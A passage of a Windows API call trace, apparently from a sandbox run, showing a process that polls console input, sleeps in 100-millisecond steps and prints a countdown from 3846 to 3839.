[0239.890] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0239.890] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604a
[0239.890] Sleep (dwMilliseconds=0x64)
[0240.030] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0240.031] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604a
[0240.031] Sleep (dwMilliseconds=0x64)
[0240.171] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0240.171] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604a
[0240.171] Sleep (dwMilliseconds=0x64)
[0240.311] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0240.312] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604a
[0240.312] Sleep (dwMilliseconds=0x64)
[0240.452] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0240.452] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604a
[0240.452] Sleep (dwMilliseconds=0x64)
[0240.639] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0240.639] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604b
[0240.639] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083846") returned 8
[0240.639] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0240.639] __iob_func () returned 0x757a2900
[0240.639] _fileno (_File=0x757a2920) returned 1
[0240.639] _errno () returned 0x5507d8
[0240.639] _get_osfhandle (_FileHandle=1) returned 0x4c
[0240.639] _errno () returned 0x5507d8
[0240.639] GetFileType (hFile=0x4c) returned 0x2
[0240.639] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0240.639] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0240.640] lstrlenW (lpString="\x08\x08\x08\x083846") returned 8
[0240.795] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0240.795] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604b
[0240.795] Sleep (dwMilliseconds=0x64)
[0240.982] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0240.982] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604b
[0240.982] Sleep (dwMilliseconds=0x64)
[0241.185] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0241.185] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604b
[0241.185] Sleep (dwMilliseconds=0x64)
[0241.331] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0241.331] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604b
[0241.331] Sleep (dwMilliseconds=0x64)
[0241.497] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0241.498] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604c
[0241.498] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083845") returned 8
[0241.498] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0241.498] __iob_func () returned 0x757a2900
[0241.498] _fileno (_File=0x757a2920) returned 1
[0241.498] _errno () returned 0x5507d8
[0241.498] _get_osfhandle (_FileHandle=1) returned 0x4c
[0241.498] _errno () returned 0x5507d8
[0241.498] GetFileType (hFile=0x4c) returned 0x2
[0241.498] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0241.498] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0241.498] lstrlenW (lpString="\x08\x08\x08\x083845") returned 8
[0241.638] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0241.638] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604c
[0241.638] Sleep (dwMilliseconds=0x64)
[0241.778] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0241.778] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604c
[0241.778] Sleep (dwMilliseconds=0x64)
[0241.903] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0241.903] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604c
[0241.903] Sleep (dwMilliseconds=0x64)
[0242.043] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0242.043] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604c
[0242.043] Sleep (dwMilliseconds=0x64)
[0242.183] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0242.183] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604c
[0242.183] Sleep (dwMilliseconds=0x64)
[0242.308] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0242.308] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604c
[0242.308] Sleep (dwMilliseconds=0x64)
[0242.428] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0242.429] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604c
[0242.429] Sleep (dwMilliseconds=0x64)
[0242.551] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0242.551] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604d
[0242.551] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083844") returned 8
[0242.551] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0242.551] __iob_func () returned 0x757a2900
[0242.551] _fileno (_File=0x757a2920) returned 1
[0242.551] _errno () returned 0x5507d8
[0242.551] _get_osfhandle (_FileHandle=1) returned 0x4c
[0242.551] _errno () returned 0x5507d8
[0242.551] GetFileType (hFile=0x4c) returned 0x2
[0242.551] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0242.551] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0242.551] lstrlenW (lpString="\x08\x08\x08\x083844") returned 8
[0242.652] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0242.652] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604d
[0242.652] Sleep (dwMilliseconds=0x64)
[0242.762] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0242.762] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604d
[0242.762] Sleep (dwMilliseconds=0x64)
[0242.870] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0242.870] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604d
[0242.870] Sleep (dwMilliseconds=0x64)
[0242.979] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0242.979] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604d
[0242.979] Sleep (dwMilliseconds=0x64)
[0243.088] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0243.088] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604d
[0243.088] Sleep (dwMilliseconds=0x64)
[0243.197] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0243.197] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604d
[0243.197] Sleep (dwMilliseconds=0x64)
[0243.307] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0243.307] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604d
[0243.307] Sleep (dwMilliseconds=0x64)
[0243.416] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0243.416] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604d
[0243.416] Sleep (dwMilliseconds=0x64)
[0243.525] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0243.525] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604e
[0243.525] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083843") returned 8
[0243.525] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0243.525] __iob_func () returned 0x757a2900
[0243.526] _fileno (_File=0x757a2920) returned 1
[0243.526] _errno () returned 0x5507d8
[0243.526] _get_osfhandle (_FileHandle=1) returned 0x4c
[0243.526] _errno () returned 0x5507d8
[0243.526] GetFileType (hFile=0x4c) returned 0x2
[0243.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0243.526] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0243.526] lstrlenW (lpString="\x08\x08\x08\x083843") returned 8
[0243.634] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0243.635] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604e
[0243.635] Sleep (dwMilliseconds=0x64)
[0243.743] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0243.744] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604e
[0243.744] Sleep (dwMilliseconds=0x64)
[0243.853] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0243.853] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604e
[0243.853] Sleep (dwMilliseconds=0x64)
[0243.962] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0243.962] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604e
[0243.962] Sleep (dwMilliseconds=0x64)
[0244.071] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0244.071] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604e
[0244.071] Sleep (dwMilliseconds=0x64)
[0244.180] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0244.180] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604e
[0244.180] Sleep (dwMilliseconds=0x64)
[0244.289] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0244.290] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604e
[0244.290] Sleep (dwMilliseconds=0x64)
[0244.399] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0244.399] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604e
[0244.399] Sleep (dwMilliseconds=0x64)
[0244.510] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0244.510] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604f
[0244.510] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083842") returned 8
[0244.510] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0244.511] __iob_func () returned 0x757a2900
[0244.511] _fileno (_File=0x757a2920) returned 1
[0244.511] _errno () returned 0x5507d8
[0244.511] _get_osfhandle (_FileHandle=1) returned 0x4c
[0244.511] _errno () returned 0x5507d8
[0244.511] GetFileType (hFile=0x4c) returned 0x2
[0244.511] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0244.511] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0244.511] lstrlenW (lpString="\x08\x08\x08\x083842") returned 8
[0244.618] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0244.618] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604f
[0244.618] Sleep (dwMilliseconds=0x64)
[0244.726] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0244.726] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604f
[0244.726] Sleep (dwMilliseconds=0x64)
[0244.835] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0244.836] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604f
[0244.836] Sleep (dwMilliseconds=0x64)
[0244.945] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0244.945] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604f
[0244.945] Sleep (dwMilliseconds=0x64)
[0245.054] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0245.054] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604f
[0245.054] Sleep (dwMilliseconds=0x64)
[0245.163] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0245.163] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604f
[0245.163] Sleep (dwMilliseconds=0x64)
[0245.272] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0245.272] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604f
[0245.272] Sleep (dwMilliseconds=0x64)
[0245.381] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0245.382] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604f
[0245.382] Sleep (dwMilliseconds=0x64)
[0245.491] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0245.491] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6050
[0245.491] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083841") returned 8
[0245.491] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0245.491] __iob_func () returned 0x757a2900
[0245.491] _fileno (_File=0x757a2920) returned 1
[0245.491] _errno () returned 0x5507d8
[0245.491] _get_osfhandle (_FileHandle=1) returned 0x4c
[0245.491] _errno () returned 0x5507d8
[0245.491] GetFileType (hFile=0x4c) returned 0x2
[0245.491] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0245.491] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0245.491] lstrlenW (lpString="\x08\x08\x08\x083841") returned 8
[0245.600] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0245.600] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6050
[0245.600] Sleep (dwMilliseconds=0x64)
[0245.709] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0245.709] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6050
[0245.709] Sleep (dwMilliseconds=0x64)
[0245.818] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0245.818] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6050
[0245.819] Sleep (dwMilliseconds=0x64)
[0245.936] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0245.937] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6050
[0245.937] Sleep (dwMilliseconds=0x64)
[0246.037] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0246.037] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6050
[0246.037] Sleep (dwMilliseconds=0x64)
[0246.146] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0246.146] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6050
[0246.146] Sleep (dwMilliseconds=0x64)
[0246.256] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0246.256] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6050
[0246.256] Sleep (dwMilliseconds=0x64)
[0246.364] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0246.364] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6050
[0246.364] Sleep (dwMilliseconds=0x64)
[0246.473] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0246.474] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6051
[0246.474] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083840") returned 8
[0246.474] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0246.474] __iob_func () returned 0x757a2900
[0246.474] _fileno (_File=0x757a2920) returned 1
[0246.474] _errno () returned 0x5507d8
[0246.474] _get_osfhandle (_FileHandle=1) returned 0x4c
[0246.474] _errno () returned 0x5507d8
[0246.474] GetFileType (hFile=0x4c) returned 0x2
[0246.474] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0246.474] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0246.474] lstrlenW (lpString="\x08\x08\x08\x083840") returned 8
[0246.583] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0246.583] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6051
[0246.583] Sleep (dwMilliseconds=0x64)
[0246.692] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0246.692] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6051
[0246.692] Sleep (dwMilliseconds=0x64)
[0246.801] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0246.801] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6051
[0246.801] Sleep (dwMilliseconds=0x64)
[0246.910] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0246.910] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6051
[0246.910] Sleep (dwMilliseconds=0x64)
[0247.020] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0247.020] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6051
[0247.020] Sleep (dwMilliseconds=0x64)
[0247.129] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0247.129] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6051
[0247.129] Sleep (dwMilliseconds=0x64)
[0247.238] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0247.238] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6051
[0247.238] Sleep (dwMilliseconds=0x64)
[0247.347] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0247.347] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6051
[0247.347] Sleep (dwMilliseconds=0x64)
[0247.456] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0247.457] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6052
[0247.457] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083839") returned 8
[0247.457] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0247.457] __iob_func () returned 0x757a2900
